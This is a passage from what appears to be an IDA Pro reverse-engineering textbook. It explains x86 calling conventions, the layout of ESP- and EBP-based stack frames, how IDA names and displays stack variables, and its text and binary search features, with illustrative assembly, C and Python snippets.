recognize the fastcall modifier in function declarations. When fastcall is

specified, the first two parameters passed to a function will be placed in the

ECX and EDX registers, respectively. Any remaining parameters are placed

on the stack in right-to-left order similar to stdcall. Also similar to stdcall,

fastcall functions are responsible for removing parameters from the stack

when they return to their caller. The following declaration demonstrates the

use of the fastcall modifier.

void fastcall demo_fastcall(int w, int x, int y, int z);

A compiler might generate the following code in order to call

demo_fastcall:

; demo_fastcall(1, 2, 3, 4); //programmer calls demo_fastcall

push 4 ; move parameter z to second position on stack

push 3 ; move parameter y to top position on stack

mov edx, 2 ; move parameter x to edx

mov ecx, 1 ; move parameter w to ecx

call demo_fastcall ; call the function

Note that no stack adjustment is required upon return from the call to

demo_fastcall, as demo_fastcall is responsible for clearing parameters y and z

from the stack as it returns to the caller. It is important to understand that

because two arguments are passed in registers, the called function needs to

clear only 8 bytes from the stack even though there are four arguments to the

function.
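
The cleanup rules for the three conventions described so far can be summarized in a few lines of C. This is only a sketch under stated assumptions: every parameter is assumed to occupy one 4-byte stack slot (as with int on 32-bit x86), and the enum and function names are hypothetical, chosen for illustration.

```c
/* Hypothetical model of who removes parameters from the stack. */
enum convention { CONV_CDECL, CONV_STDCALL, CONV_FASTCALL };

#define SLOT_SIZE 4u   /* assumption: one 4-byte slot per parameter */

/* Number of bytes of parameters that end up on the stack. */
unsigned stack_param_bytes(enum convention conv, unsigned nparams)
{
    unsigned on_stack = nparams;

    if (conv == CONV_FASTCALL) {
        /* The first two parameters travel in ECX and EDX. */
        on_stack = (nparams > 2) ? nparams - 2 : 0;
    }
    return on_stack * SLOT_SIZE;
}

/* Bytes the called function removes (the operand of "ret N"). */
unsigned callee_cleanup_bytes(enum convention conv, unsigned nparams)
{
    return (conv == CONV_CDECL) ? 0 : stack_param_bytes(conv, nparams);
}

/* Bytes the caller removes after the call (the "add esp, N" operand). */
unsigned caller_cleanup_bytes(enum convention conv, unsigned nparams)
{
    return (conv == CONV_CDECL) ? stack_param_bytes(conv, nparams) : 0;
}
```

With these definitions, demo_cdecl (four parameters) yields a 16-byte caller adjustment, demo_stdcall (three parameters) a 12-byte callee adjustment, and demo_fastcall (four parameters) an 8-byte callee adjustment, matching the figures quoted in the text.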

C++ Calling Conventions

Nonstatic member functions in C++ classes differ from standard functions in

that they must make available the this pointer, which points to the object used

to invoke the function. The address of the object used to invoke the function

must be supplied by the caller and is therefore provided as a parameter when

calling nonstatic member functions. The C++ language standard does not

specify how this should be passed to nonstatic member functions, so it should

come as no surprise that different compilers use different techniques when

passing this.

Microsoft Visual C++ offers the thiscall calling convention, which passes

this in the ECX register and requires the nonstatic member function to

clean parameters off the stack as in stdcall. The GNU g++ compiler treats

this as the implied first parameter to any nonstatic member function and

behaves in all other respects as if the cdecl convention is being used. Thus,

for g++-compiled code, this is placed on top of the stack prior to calling the

nonstatic member function, and the caller is responsible for removing param-

eters (there will always be at least one) from the stack once the function

returns. Additional features of compiled C++ are discussed in Chapter 8.
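
The idea of this as an implied first parameter can be written out explicitly in plain C. The following sketch uses a hypothetical struct counter and hypothetical function names; it mirrors how the text describes the g++ approach, in which the object's address is passed like any other leading argument.

```c
/* Hypothetical "class" with one data member. */
struct counter {
    int value;
};

/* Roughly what a C++ member function such as
 *     void Counter::add(int n) { this->value += n; }
 * looks like once `this` is made an explicit first parameter. */
void counter_add(struct counter *self, int n)
{
    self->value += n;
}

/* A read-only member function receives a pointer to a const object. */
int counter_get(const struct counter *self)
{
    return self->value;
}
```

Under the Microsoft thiscall convention described above, the same pointer would instead arrive in ECX, but the called code uses it in the same way.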

Other Calling Conventions

Complete coverage of every existing calling convention would require a

book in its own right. Calling conventions are often language-, compiler-,

and CPU-specific, and some research on your part may be required as you

encounter code generated by less-common compilers. A few situations

deserve special mention, however: optimized code, custom assembly lan-

guage code, and system calls.

When functions are exported for use by other programmers (such as

library functions), it is important that they adhere to well-known calling

conventions so that programmers can easily interface to those functions.

On the other hand, if a function is intended for internal program use only,

then the calling convention used by that function need be known only within

that function’s program. In such cases, optimizing compilers may choose to

use alternate calling conventions in order to generate faster code. Instances

in which this may occur include the use of the /GL option with Microsoft Visual

C++ and the use of the regparm function attribute with GNU gcc/g++.

When programmers go to the trouble of using assembly language, they

gain complete control over how parameters will be passed to any functions

that they happen to create. Unless they wish to make their functions available

to other programmers, assembly language programmers are free to pass

parameters in any way they see fit. As a result, you may need to take extra

care when analyzing custom assembly code. Custom assembly code is often

encountered in obfuscation routines and shellcode.

A system call is a special type of function call used to request an operating

system service. System calls usually effect a state transition from user mode to

kernel mode in order for the operating system kernel to service the user’s

request. The manner in which system calls are initiated varies across operat-

ing systems and CPUs. For example, Linux x86 system calls may be initiated

using the int 0x80 instruction or the sysenter instruction, while other x86

operating systems may use only the sysenter instruction or alternate interrupt

numbers. On many x86 systems (Linux being an exception) parameters for

system calls are placed on the runtime stack, and a system call number is

placed in the EAX register immediately prior to initiating the system call.

Linux system calls accept their parameters in specific registers and occasion-

ally in memory when there are more parameters than available registers.

Local Variable Layout

Unlike the calling conventions that dictate the manner in which parameters

are passed into a function, there are no conventions that mandate the layout

of a function’s local variables. When compiling a function, one task a com-

piler is faced with is to compute the amount of space required by a function’s

local variables. Another task is to determine whether those variables can be

allocated in CPU registers or whether they must be allocated on the program

stack. The exact manner in which these allocations are made is irrelevant to

both the caller of a function and to any functions that may, in turn, be called.

Most notably, it is typically impossible to determine a function’s local variable

layout based on examination of the function’s source code.

Stack Frame Examples

Consider the following function compiled on a 32-bit x86-based computer:

void bar(int j, int k);   // a function to call

void demo_stackframe(int a, int b, int c) {
    int x;
    char buffer[64];
    int y;
    int z;
    // body of function not terribly relevant other than the call to bar
    bar(z, y);
}

We compute the minimum amount of stack space required for local

variables as 76 bytes (three 4-byte integers and a 64-byte buffer). This function

could use either stdcall or cdecl, and the stack frame will look the same.

Figure 6-3 shows one possible implementation of a stack frame for an invoca-

tion of demo_stackframe, assuming that no frame pointer register is used (thus

the stack pointer, ESP, serves as the frame pointer). This frame would be set

up on entry to demo_stackframe with the one-line prologue:

sub esp, 76 ; allocate sufficient space for all local variables

The Offset column indicates the base+displacement address required to

reference any of the local variables or parameters in the stack frame.

Figure 6-3: An ESP-based stack frame

Variable     Offset       Region
z            [esp]        local variables (esp points here)
y            [esp+4]      local variables
buffer       [esp+8]      local variables
x            [esp+72]     local variables
saved eip    [esp+76]
a            [esp+80]     parameters
b            [esp+84]     parameters
c            [esp+88]     parameters

Generating functions that utilize the stack pointer to compute all variable

references requires a little more effort on the part of the compiler, as the

stack pointer changes frequently and the compiler must make sure that proper

offsets are used at all times when referencing any variables within the stack

frame. Consider the call made to bar in function demo_stackframe, the code

for which is shown here:

➊ push dword [esp+4]        ; push y
➋ push dword [esp+4]        ; push z
  call bar
  add esp, 8                ; cdecl requires caller to clear parameters

The push at ➊ correctly pushes local variable y per the offset in Figure 6-3.

At first glance it might appear that the push at ➋ incorrectly references local

variable y a second time. However, because we are dealing with an ESP-based

frame and the push at ➊ modifies ESP, all of the offsets in Figure 6-3 must be

temporarily adjusted each time ESP changes. Following ➊, the new offset for

local variable z becomes [esp+4] as correctly referenced in the push at ➋. When

examining functions that reference stack frame variables using the stack

pointer, you must be careful to note any changes to the stack pointer and

adjust all future variable offsets accordingly. One advantage of using the

stack pointer to reference all stack frame variables is that all other registers

remain available for other purposes.
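
The bookkeeping described above can be sketched in C. The table below copies the offsets from Figure 6-3; the struct, the array, and the function name esp_disp are hypothetical, and the model assumes the only changes to ESP since the prologue are pushes of a known total size.

```c
#include <string.h>

/* One entry per slot in the ESP-based frame of Figure 6-3. */
struct frame_slot {
    const char *name;
    int entry_disp;    /* displacement from ESP right after the prologue */
};

static const struct frame_slot esp_frame[] = {
    { "z", 0 },  { "y", 4 },  { "buffer", 8 },  { "x", 72 },
    { "saved eip", 76 },  { "a", 80 },  { "b", 84 },  { "c", 88 },
};

/* Displacement to use in [esp+disp] for `name` after `bytes_pushed`
 * additional bytes have been pushed. Returns -1 for an unknown name. */
int esp_disp(const char *name, int bytes_pushed)
{
    size_t count = sizeof esp_frame / sizeof esp_frame[0];

    for (size_t i = 0; i < count; i++) {
        if (strcmp(esp_frame[i].name, name) == 0) {
            /* Each push lowers ESP, so every slot appears farther away. */
            return esp_frame[i].entry_disp + bytes_pushed;
        }
    }
    return -1;
}
```

For the call to bar, esp_disp("y", 0) gives 4 for the first push, and esp_disp("z", 4) also gives 4 for the second, which is why both instructions reference [esp+4].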

Once demo_stackframe has completed, it needs to return to the caller.

Ultimately a ret instruction will be used to pop the desired return address

off the top of the stack into the instruction pointer register (EIP in this case).

Before the return address can be popped, the local variables need to be

removed from the top of the stack so that the stack pointer correctly points

to the saved return address when the ret instruction is executed. For this

particular function the resulting epilogue becomes

add esp, 76 ; adjust esp to point to the saved return address

ret ; return to the caller

At the expense of dedicating a register for use as a frame pointer and

some code to configure the frame pointer on entry to the function, the job

of computing local variable offsets can be made easier. In x86 programs, the

EBP (extended base pointer) register is typically dedicated for use as a stack frame

pointer. By default, most compilers generate code to use a frame pointer,

though options typically exist for specifying that the stack pointer should be

used instead. GNU gcc/g++, for example, offers the -fomit-frame-pointer

compiler option, which generates functions that do not rely on a fixed frame

pointer register.

In order to see what the stack frame for demo_stackframe will look like using

a dedicated frame pointer, we need to consider this new prologue code:

➌ push ebp          ; save the caller's ebp value
➍ mov ebp, esp      ; make ebp point to the saved register value
➎ sub esp, 76       ; allocate space for local variables

The push instruction at ➌ saves the value of EBP currently being used by

the caller. Functions that adhere to the System V Application Binary Interface

for Intel 32-bit Processors² are allowed to modify the EAX, ECX, and

EDX registers but are required to preserve the caller’s values for all other

registers. Therefore, if we wish to use EBP as a frame pointer, we must save

the current value of EBP before we change it, and we must restore the value

of EBP before we return to the caller. If any other registers need to be saved

on behalf of the caller (ESI or EDI, for example), compilers may choose to

save them at the same time EBP is saved, or they may defer saving them until

local variables have been allocated. Thus, there is no standard location

within a stack frame for the storage of saved registers.

2. See http://www.sco.com/developers/devspecs/abi386-4.pdf.

Once EBP has been saved, it can be changed to point to the current stack

location. This is accomplished by the mov instruction at ➍, which copies the

current value of the stack pointer into EBP. Finally, as in the non-EBP-based

stack frame, space for local variables is allocated at ➎. The resulting stack

frame layout is shown in Figure 6-4.

Figure 6-4: An EBP-based stack frame

Variable     Offset       Region
z            [ebp-76]     local variables (esp points here)
y            [ebp-72]     local variables
buffer       [ebp-68]     local variables
x            [ebp-4]      local variables
saved ebp    [ebp]        saved register(s) (ebp points here)
saved eip    [ebp+4]
a            [ebp+8]      parameters
b            [ebp+12]     parameters
c            [ebp+16]     parameters

With a dedicated frame pointer, all variable offsets are computed relative

to the frame pointer register. It is most often (though not necessarily) the

case that positive offsets are used to access function parameters, while

negative offsets are required to access local variables. With a dedicated frame

pointer in use, the stack pointer may be freely changed without affecting the

offset to any variables within the frame. The call to function bar can now be

implemented as follows:

➏ push dword [ebp-72]       ; push y
  push dword [ebp-76]       ; push z
  call bar
  add esp, 8                ; cdecl requires caller to clear parameters

The fact that the stack pointer has changed following the push at ➏ has

no effect on the access to local variable z in the succeeding push.

Finally, the use of a frame pointer necessitates a slightly different epilogue

once the function completes, as the caller’s frame pointer must be restored

prior to returning. Local variables must be cleared from the stack before the

old value of the frame pointer can be retrieved, but this is made easy by the

fact that the current frame pointer points to the old frame pointer. In x86

programs utilizing EBP as a frame pointer, the following code represents a

typical epilogue:

mov esp, ebp ; clears local variables by resetting esp

pop ebp ; restore the caller's value of ebp

ret ; pop return address to return to the caller

This operation is so common that the x86 architecture offers the leave

instruction as an abbreviated means of accomplishing the same task.

leave ; copies ebp to esp AND then pops into ebp

ret ; pop return address to return to the caller

While the names of registers and instructions used will certainly differ

for other processor architectures, the basic process of building stack frames

will remain the same. Regardless of the architecture, you will want to familiar-

ize yourself with typical prologue and epilogue sequences so that you can

quickly move on to analyzing more interesting code within functions.
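
The EBP-based prologue and epilogue can be traced with a toy model. The following C sketch is an illustration only: struct cpu, the 64-word stack, and the function names are hypothetical, and the model tracks just ESP, EBP, and EIP as byte offsets into a small array rather than emulating a real processor.

```c
#include <stdint.h>

#define STACK_WORDS 64

/* Toy machine state; esp and ebp are byte offsets into stack[]. */
struct cpu {
    uint32_t esp;
    uint32_t ebp;
    uint32_t eip;
    uint32_t stack[STACK_WORDS];
};

static void push32(struct cpu *c, uint32_t value)
{
    c->esp -= 4;                       /* the stack grows toward lower addresses */
    c->stack[c->esp / 4] = value;
}

static uint32_t pop32(struct cpu *c)
{
    uint32_t value = c->stack[c->esp / 4];
    c->esp += 4;
    return value;
}

/* call target: save the return address, then transfer control. */
void sim_call(struct cpu *c, uint32_t target, uint32_t return_addr)
{
    push32(c, return_addr);
    c->eip = target;
}

/* push ebp / mov ebp, esp / sub esp, local_bytes */
void sim_prologue(struct cpu *c, uint32_t local_bytes)
{
    push32(c, c->ebp);
    c->ebp = c->esp;
    c->esp -= local_bytes;
}

/* mov esp, ebp / pop ebp (together: leave), followed by ret */
void sim_epilogue(struct cpu *c)
{
    c->esp = c->ebp;
    c->ebp = pop32(c);
    c->eip = pop32(c);
}
```

Starting with esp set to 256, a call followed by sim_prologue(&c, 76) leaves ebp 76 bytes above esp with the saved EBP at [ebp] and the return address at [ebp+4], as in Figure 6-4. After sim_epilogue, esp, ebp, and eip hold the values the caller expects.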

IDA Stack Views

Stack frames are clearly a runtime concept; a stack frame can’t exist without

a stack and without a running program. While this is true, it doesn’t mean

that you should ignore the concept of a stack frame when you are performing

static analysis with tools such as IDA. All of the code required to set up stack

frames for each function is present within a binary. Through careful analysis

of this code, we can gain a detailed understanding of the structure of any

function’s stack frame even when the function is not running. In fact, some

of IDA’s most sophisticated analysis is performed specifically to determine

the layout of stack frames for every function that IDA disassembles. During initial

analysis, IDA goes to great lengths to monitor the behavior of the

stack pointer over the course of a function by making note of every push or

pop operation along with any arithmetic operations that may change the stack

pointer, such as adding or subtracting constant values. The first goal of this

analysis is to determine the exact size of the local variable area allocated to

a function’s stack frame. Additional goals include determining whether a

dedicated frame pointer is in use in a given function (by recognizing a push

ebp/mov ebp, esp sequence, for example) and recognizing all memory ref-

erences to variables within a function’s stack frame. For example, if IDA noted

the following instruction in the body of demo_stackframe

mov eax, [ebp+8]

it would understand that the first argument to the function (a in this case)

is being loaded into the EAX register (refer to Figure 6-4). Through careful

analysis of the stack frame structure, IDA can distinguish between memory

references that access function arguments (those that lie below the saved

return address) and references that access local variables (those that lie above

the saved return address). IDA takes the additional step of determining

which memory locations within a stack frame are directly referenced. For

example, while the stack frame in Figure 6-4 is 96 bytes in size, there are

only seven variables that we are likely to see referenced (four locals and three

parameters).
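
The kind of stack pointer tracking described above can be approximated in a few lines of C. This is a simplified sketch, not IDA's actual algorithm: it models only four hypothetical operation types, assumes 4-byte pushes and pops, and ignores control flow entirely.

```c
#include <stddef.h>

/* Hypothetical instruction kinds that change ESP. */
enum sp_op { OP_PUSH, OP_POP, OP_SUB_ESP, OP_ADD_ESP };

struct insn {
    enum sp_op op;
    int imm;          /* constant operand; used by OP_SUB_ESP and OP_ADD_ESP */
};

/* Net change to ESP after executing `n` instructions in order.
 * A negative result means the stack has grown by that many bytes. */
int sp_delta(const struct insn *code, size_t n)
{
    int delta = 0;

    for (size_t i = 0; i < n; i++) {
        switch (code[i].op) {
        case OP_PUSH:    delta -= 4;            break;
        case OP_POP:     delta += 4;            break;
        case OP_SUB_ESP: delta -= code[i].imm;  break;
        case OP_ADD_ESP: delta += code[i].imm;  break;
        }
    }
    return delta;
}
```

Feeding it push ebp followed by sub esp, 76 reports a change of -80 bytes, of which 76 bytes form the local variable area. Feeding it the four pushes and the add esp, 16 of the cdecl call sequence reports a net change of zero.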

Understanding the behavior of a function often comes down to under-

standing the types of data that the function manipulates. When reading

a disassembly listing, one of the first opportunities that you will have to

understand the data a function manipulates is to view the breakdown of

the function’s stack frame. IDA offers two views into any function’s stack

frame: a summary view and a detail view. In order to understand these two

views, we will refer to the following version of demo_stackframe, which we

have compiled using gcc.

void demo_stackframe(int a, int b, int c) {
    int x = c;
    char buffer[64];
    int y = b;
    int z = 10;
    buffer[0] = 'A';
    bar(z, y);
}

In this example, local variables x and y are initialized from parameters c

and b, respectively. Local variable z is initialized with the constant value 10,

and the first character in the 64-byte local array, named buffer, is initialized

to the letter 'A'. The corresponding IDA disassembly of this function

appears here.

.text:00401090 ; ========= S U B R O U T I N E ===========================
.text:00401090
.text:00401090 ; Attributes: ➊bp-based frame
.text:00401090
.text:00401090 demo_stackframe proc near        ; CODE XREF: sub_4010C1+41↓p
.text:00401090
.text:00401090 ➍ var_60 = dword ptr -60h
.text:00401090   var_5C = dword ptr -5Ch
.text:00401090   var_58 = byte ptr -58h
.text:00401090   var_C  = dword ptr -0Ch
.text:00401090   arg_4  = dword ptr  0Ch
.text:00401090   arg_8  = dword ptr  10h
.text:00401090
.text:00401090   push ebp
.text:00401091   mov ebp, esp
.text:00401093   sub esp, ➋78h
.text:00401096   mov eax, [ebp+➎arg_8]
.text:00401099 ➏ mov [ebp+var_C], eax
.text:0040109C ➐ mov eax, [ebp+arg_4]
.text:0040109F ➐ mov [ebp+var_5C], eax
.text:004010A2 ➑ mov [ebp+var_60], 0Ah
.text:004010A9 ➒ mov [ebp+var_58], 41h
.text:004010AD   mov eax, [ebp+var_5C]
.text:004010B0 ➌ mov [esp+4], eax
.text:004010B4   mov eax, [ebp+var_60]
.text:004010B7 ➌ mov [esp], eax
.text:004010BA   call bar
.text:004010BF   leave
.text:004010C0   retn
.text:004010C0 demo_stackframe endp

There are many points to cover in this listing as we begin to acquaint

ourselves with IDA’s disassembly notation. We begin at ➊ by noting that IDA

believes this function uses the EBP register as a frame pointer based on analysis

of the function prologue. At ➋ we learn that gcc has allocated 120 bytes (78h

equates to 120) of local variable space in the stack frame. This includes 8 bytes

for passing the two parameters to bar at ➌, but it is still far greater than the

76 bytes we had estimated previously and demonstrates that compilers

occasionally pad the local variable space with extra bytes in order to ensure a

particular alignment within the stack frame. Beginning at ➍, IDA provides a

summary stack view that lists every variable that is directly referenced within

the stack frame, along with the variable’s size and offset distance from the

frame pointer.

IDA assigns names to variables based on their location relative to the

saved return address. Local variables lie above the saved return address,

while function parameters lie below the saved return address. Local variable

names are derived using the var_ prefix joined with a hexadecimal suffix

that indicates the distance, in bytes, that the variable lies above the saved

frame pointer. Local variable var_C, in this case, is a 4-byte (dword) variable

that lies 12 bytes above the saved frame pointer ([ebp-0Ch]). Function param-

eter names are generated using the arg_ prefix combined with a hexadecimal

suffix that represents the relative distance from the topmost parameter.

Thus the topmost 4-byte parameter would be named arg_0, while successive

parameters would be named arg_4, arg_8, arg_C, and so on. In this particular

example arg_0 is not listed because the function makes no use of parameter a:

IDA finds no memory reference to [ebp+8] (the location of the first parameter),

so it generates no name for that location. A quick scan of the summary stack

view reveals that there are many stack locations that IDA has failed to name

because no direct references to those locations exist in the program code.

NOTE The only stack variables that IDA will automatically generate names for are those that

are directly referenced within a function.
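The naming rule just described can be sketched in a few lines of Python. This is only an illustration, not IDA's implementation: the function name default_stack_name is hypothetical, and the sketch assumes a 32-bit, EBP-based frame in which the saved EBP sits at offset 0, the saved return address at offset 4, and the first parameter at offset 8.

```python
def default_stack_name(ebp_offset: int) -> str:
    """Return an IDA-style default name for an EBP-relative offset.

    Assumption: 32-bit, EBP-based frame (saved EBP at 0, saved return
    address at 4, first parameter at 8). Hypothetical helper, not IDA code.
    """
    first_arg_offset = 8
    if ebp_offset < 0:
        # Locals: the suffix is the hex distance from the saved frame pointer.
        return "var_%X" % -ebp_offset
    if ebp_offset >= first_arg_offset:
        # Parameters: the suffix is the hex distance from the first parameter.
        return "arg_%X" % (ebp_offset - first_arg_offset)
    raise ValueError("offset falls on the saved EBP or the return address")


# Offsets taken from the summary stack view of demo_stackframe.
for off in (-0x60, -0x5C, -0x58, -0x0C, 0x0C, 0x10):
    print("%+d -> %s" % (off, default_stack_name(off)))
```

The loop yields var_60, var_5C, var_58, var_C, arg_4, and arg_8, the same names that appear in the summary stack view.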

An important difference between IDA’s disassembly listing and the

stack frame analysis that we performed earlier is the fact that nowhere in the

disassembly listing do we see memory references similar to [ebp-12]. Instead,

IDA has replaced all constant offsets with symbolic names corresponding to

the symbols in the stack view and their relative offsets from the stack frame

pointer. This is in keeping with IDA’s goal of generating a higher-level dis-

assembly. It is simply easier to deal with symbolic names than numeric con-

stants. In fact, as we will see later, IDA allows us to change the names of any

stack variable to whatever we wish, making the names that much easier for us

to remember. The summary stack view serves as a map from IDA-generated

names to their corresponding stack frame offsets. For example, where the

memory reference [ebp+arg_8] appears in the disassembly, [ebp+10h] or [ebp+16]

could be used instead. If you prefer numeric offsets, IDA will happily show

them to you. Right-clicking arg_8 at \ yields the context-sensitive menu

shown in Figure 6-5, which contains several options to change the display

format.

Figure 6-5: Selecting an alternate display format

In this example, since we have source code available for comparison,

we can map the IDA-generated variable names back to the names used in

the original source using a variety of clues available in the disassembly.

1. First, demo_stackframe takes three parameters: a, b, and c. These correspond

to variables arg_0, arg_4, and arg_8 respectively (though arg_0 is missing in

the disassembly because it is never referenced).

2. Local variable x is initialized from parameter c. Thus var_C corresponds

to x since it is initialized from arg_8 at ].

3. Similarly, local variable y is initialized from parameter b. Thus, var_5C

corresponds to y since it is initialized from arg_4 at ^.

4. Local variable z corresponds to var_60 since it is initialized with the

value 10 at _.

5. The 64-byte character array buffer begins at var_58 since buffer[0] is

initialized with A (ASCII 0x41) at `.

6. The two arguments for the call to bar are moved into the stack at Z rather

than being pushed onto the stack. This is typical of current versions of

gcc (versions 3.4 and later). IDA recognizes this convention and elects

not to create local variable references for the two items at the top of the

stack frame.

In addition to the summary stack view, IDA offers a detailed stack frame

view in which every byte allocated to a stack frame is accounted for. The

detailed view is accessed by double-clicking any variable name associated with

a given stack frame. Double-clicking var_C in the previous listing would bring

up the stack frame view shown in Figure 6-6 (ESC closes the window).

Figure 6-6: IDA stack frame view

Because the detailed view accounts for every byte in the stack frame, it

occupies significantly more space than the summary view, which lists only

referenced variables. The portion of the stack frame shown in Figure 6-6

spans a total of 32 bytes, which represents only a small portion of the entire

stack frame. Note that no names are assigned to bytes that are not referenced

directly within the function. For example, parameter a, corresponding to

arg_0, was never referenced within demo_stackframe. With no memory reference

to analyze, IDA opts to do nothing with the corresponding bytes in the stack

frame, which occupy offsets +00000008 through +0000000B. On the other hand,

arg_4 was directly referenced at ^ in the disassembly listing, where its contents

were loaded into the 32-bit EAX register. Based on the fact that 32 bits of

data were moved, IDA is able to infer that arg_4 is a 4-byte quantity and

labels it as such (db defines 1 byte of storage; dw defines 2 bytes of storage, also

called a word; and dd defines 4 bytes of storage, also called a double word).

Two special values shown in Figure 6-6 are “ s” and “ r” (each starts with

a leading space). These pseudo variables are IDA’s special representation of

the saved return address (“ r”) and the saved register value(s) (“ s” represent-

ing only EBP in this example). These values are included in the stack frame

view for completeness, as every byte in the stack frame is accounted for.

The stack frame view offers a detailed look at the inner workings of compilers.

In Figure 6-6 it is clear that the compiler has inserted 8 extra bytes between

the saved frame pointer “ s” and the local variable x (var_C). These bytes

occupy offsets -00000001 through -00000008 in the stack frame. Further, a lit-

tle math performed on the offset associated with each variable listed in the

summary view reveals that the compiler has allocated 76 (rather than 64 per

the source code) bytes to the character buffer at var_58. Unless you happen

to be a compiler writer yourself or are willing to dig deep into the source

code for gcc, all you can do is speculate as to why these extra bytes are allo-

cated in this manner. In most cases we can chalk up the extra bytes to padding

for alignment, and usually the presence of these extra bytes has no impact on

a program’s behavior. After all, if a programmer asks for 64 bytes and is given

76, the program should behave no differently, especially since the program-

mer shouldn’t be using more than the 64 bytes requested. On the other hand,

if you happen to be an exploit developer and learn that it is possible to over-

flow this particular buffer, then you might be very interested in the fact that

nothing interesting can even begin to happen until you have supplied at least

76 bytes, which is the effective size of the buffer as far as the compiler is con-

cerned. In Chapter 8 we will return to the stack frame view and its uses in

dealing with more complex datatypes such as arrays and structures.
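The "little math" behind these observations can be reproduced with a short Python sketch. The offsets are those listed in the summary stack view; the helper name spans is hypothetical, and treating each variable as extending up to the next referenced item is an assumption that mirrors how we read the frame here, not something IDA reports.

```python
# EBP-relative offsets of the referenced locals in demo_stackframe.
referenced = {"var_60": -0x60, "var_5C": -0x5C, "var_58": -0x58, "var_C": -0x0C}
SAVED_EBP_OFFSET = 0  # location of " s" in the stack frame view


def spans(offsets, upper_bound):
    """Map each name to the number of bytes up to the next named item."""
    ordered = sorted(offsets.items(), key=lambda item: item[1])
    result = {}
    for i, (name, start) in enumerate(ordered):
        end = ordered[i + 1][1] if i + 1 < len(ordered) else upper_bound
        result[name] = end - start
    return result


sizes = spans(referenced, SAVED_EBP_OFFSET)
for name, size in sizes.items():
    print("%-6s spans %d bytes" % (name, size))

# var_C is a 4-byte dword, so the rest of its span is compiler padding.
padding_after_var_c = sizes["var_C"] - 4
print("padding between var_C and the saved EBP:", padding_after_var_c)
```

Under these assumptions var_58 spans 76 bytes (0x58 - 0x0C) rather than the 64 requested in the source, and 8 bytes of padding separate var_C from the saved frame pointer.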

Searching the Database

IDA makes it easy to navigate to things that you know about and designs

many of its data displays to summarize specific types of information (names,

strings, imports, and so on), making them easy to find as well. However, what

features are offered to help you conduct more general searches through

your databases? If you take time to review the contents of the Search menu,

you will find a long list of options, the majority of which take you to the next

item in some category. For example, Search▸Next Code moves the cursor to

the next location containing an instruction. You may also wish to familiarize

yourself with the options available on the Jump menu. For many of these,

you are presented with a list of locations to choose from. Jump▸Jump to

Function, for example, brings up a list of all functions, allowing you to

quickly choose one and navigate to it. While these canned search features

may often be useful, two types of general-purpose searches are worth more

detailed discussion: text searches and binary searches.

Text Searches

IDA text searches amount to substring searches through the disassembly

listing view. Text searches are initiated via Search▸Text (hotkey: ALT-T),

which opens the dialog shown in Figure 6-7. A number of self-explanatory

options dictate specific details concerning the search to be performed.

As shown, POSIX-style regular expressions are permitted. The Identifier

search is somewhat misnamed. In reality it restricts the search to find whole

words only and can match any whole word on an assembly line, including

opcode mnemonics or constant values. An Identifier search for 401116 would

fail to find a symbol named loc_401116.
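The difference between a plain substring search and an Identifier search can be approximated with regular-expression word boundaries. The following Python sketch is only a model of the behavior described above; the function name text_search and the sample lines are hypothetical, and IDA's actual matching rules may differ in edge cases.

```python
import re


def text_search(lines, needle, identifier=False):
    """Return the lines that contain needle.

    With identifier=True the needle must match a whole word, modeled here
    with \\b word boundaries (letters, digits, and underscore form words).
    """
    pattern = re.escape(needle)
    if identifier:
        pattern = r"\b" + pattern + r"\b"
    return [line for line in lines if re.search(pattern, line)]


listing = [
    "mov     eax, [ebp+arg_0]",
    "movzx   eax, al",
    "jmp     short loc_401116",
]

print(text_search(listing, "mov"))                      # both mov and movzx lines
print(text_search(listing, "mov", identifier=True))     # only the mov line
print(text_search(listing, "401116"))                   # the jmp line
print(text_search(listing, "401116", identifier=True))  # no match
```

In this model 401116 is not a whole word inside loc_401116 because the underscore that precedes it counts as a word character, which is why the Identifier search comes up empty.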

Selecting Find all occurrences causes the search results to be opened in a

new window, allowing easy navigation to any single match of the search

criteria. Finally, the previous search can be repeated to locate the next match

using CTRL-T or Search▸Next Text.

Figure 6-7: Text Search dialog

Binary Searches

If you need to search for specific binary content such as a known sequence of

bytes, then text searches are not the answer. Instead, you need to use IDA’s

binary search facilities. While the text search searches the disassembly window,

the binary search will search only the content portion of the Hex View win-

dow. Either the hex dump or the ASCII dump can be searched, depending on

how the search string is specified. A binary search is initiated using

Search▸Sequence of Bytes, or ALT-B. Figure 6-8 shows the Binary Search dialog. To

search for a sequence of hex bytes, the search string should be specified as a

space-separated list of two-digit hex values such as CA FE BA BE, which behaves

identically to a search for ca fe ba be, despite the availability of a

Case-sensitive option.

Alternatively, to search for embedded string data (effectively searching

the ASCII dump portion of the Hex View window), you must surround the

search strings with quotes. Use the Unicode strings option to search for the

Unicode version of your search string.
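One way to picture the two forms of search string is as a small parser that turns the dialog input into the bytes to look for. The Python sketch below is an illustration only: parse_search_string is a hypothetical helper, not IDA's parser, and it assumes that the Unicode strings option means UTF-16 little-endian encoding.

```python
def parse_search_string(text, unicode_strings=False):
    """Convert a Binary Search style input into the bytes to search for."""
    text = text.strip()
    if len(text) >= 2 and text[0] == '"' and text[-1] == '"':
        # Quoted input is string data rather than hex values.
        literal = text[1:-1]
        # Assumption: "Unicode" is modeled as UTF-16LE in this sketch.
        return literal.encode("utf-16-le" if unicode_strings else "ascii")
    # Otherwise expect space-separated hex values; digit case is irrelevant.
    return bytes(int(token, 16) for token in text.split())


print(parse_search_string("CA FE BA BE").hex())
print(parse_search_string("ca fe ba be").hex())
print(parse_search_string('"hello"'))
print(parse_search_string('"hello"', unicode_strings=True))
```

The first two calls produce the same four bytes, which is why the case of the hex digits themselves never matters.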

The Case-sensitive option can be a cause of confusion. For string searches

it is fairly straightforward; a search for “hello” will successfully find “HELLO”

if Case-sensitive is not selected. Things get a little interesting if you perform

a hex search and leave Case-sensitive unchecked. If you conduct a case-

insensitive search for E9 41 C3, you may be surprised when your search matches

E9 61 C3. The two strings are considered to match because 0x41 corresponds

to the character A while 0x61 corresponds to a. So, even though you have

specified a hex search, 0x41 is considered equivalent to 0x61 because you

failed to specify a case-sensitive search.

Figure 6-8: Binary Search dialog

NOTE When conducting hex searches, make sure that you specify Case-sensitive if you want to

restrict the search to exact matches. This is important if you are searching for specific

opcode sequences rather than ASCII text.
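The surprising hex match is easy to reproduce outside of IDA. The Python sketch below models a case-insensitive search by folding ASCII uppercase letters to lowercase in both the data and the pattern before comparing. The helper names fold and find_bytes are hypothetical, and folding in this way is an assumption about how such a search might behave, not a description of IDA's internals.

```python
def fold(value: int) -> int:
    """Map ASCII 'A'-'Z' (0x41-0x5A) to 'a'-'z'; leave other bytes alone."""
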